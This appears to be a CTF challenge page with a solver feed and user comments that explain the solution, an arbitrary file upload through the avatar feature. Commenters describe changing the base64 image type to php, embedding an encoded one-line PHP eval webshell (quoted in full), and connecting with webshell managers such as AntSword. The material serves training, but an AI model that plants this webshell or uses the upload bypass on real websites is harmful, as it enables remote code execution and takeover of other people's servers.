评分(10)
解题动态

llggff 攻破了该题 1小时前

2021060287 攻破了该题 8小时前

cl20354 攻破了该题 1天前

yamojito 攻破了该题 1天前

咻猫 攻破了该题 2天前

姥姥 攻破了该题 4天前

zhuyh69 攻破了该题 4天前

dongxin 攻破了该题 5天前

shuishuang1003 攻破了该题 5天前

eason2023 攻破了该题 7天前

huasir 攻破了该题 9天前

孙燕姿圈外男友 攻破了该题 10天前

baotou91 攻破了该题 11天前

hupeng888 攻破了该题 16天前

kbhjt 攻破了该题 16天前

19957910119 攻破了该题 18天前

pebbler23 攻破了该题 18天前

admin123 攻破了该题 19天前

聪10011 攻破了该题 20天前

评论
不会打CTF的向南 3年前
举报
https://blog.csdn.net/m0_61011147/article/details/122963125
狐萝卜CarroT 3年前
举报
注入点在上传头像那 发布二货那里也可以上传图片,不过是不是注入点我没试
Rebori 3年前
举报
三个蚁剑冰鞋菜刀都连不上 真是邪了门了 浪费金币 淦
狐萝卜CarroT 3年前
举报
@Rebori 一句话木马都长一个样啊
狐萝卜CarroT 3年前
举报
@Rebori 我第一次尝试的时候转码后最后一位是个”+“,就出问题了。
Rebori 3年前
举报
@狐萝卜CarroT 你的一句话木马可以看发一下看看吗
狐萝卜CarroT 3年前
举报
可能是上传的一句话木马的问题
study123 3年前
举报
注意有些评论的字符被bugku过滤替换掉了
study123 3年前
举报
用蚂剑连上后,我又试了很多次,好像是有些参数名(也就是所谓的密码)是不行的,测了‘cmd’死活不行,后面的>会不见,测试发现这个‘’<?php @eval($_POST['user']); ?>‘’可以,还有?前面是有一个空格的
study123 3年前
举报
头像上传那里,抓包,data%3Aimage%2Fphp%3Bbase64%2C%2F9j%2F后面的数据全删了,然后在自己加上编码过的一句话木马。jpeg要改成php
kjdfklha 3年前
举报
很经典的文件上传题目,点赞
helloxy 3年前
举报
头像上传,然后抓包修改,base64编码方式
BATQQ 3年前
举报
好题目
onerm 4年前
举报
后台上传图片存在任意文件上传漏洞,更改base64加密后的图片后缀名和内容(base64加密的一句话把结尾?>去掉,否则在后台base64解密>为空又有?会发生语句错误),再用蚁剑连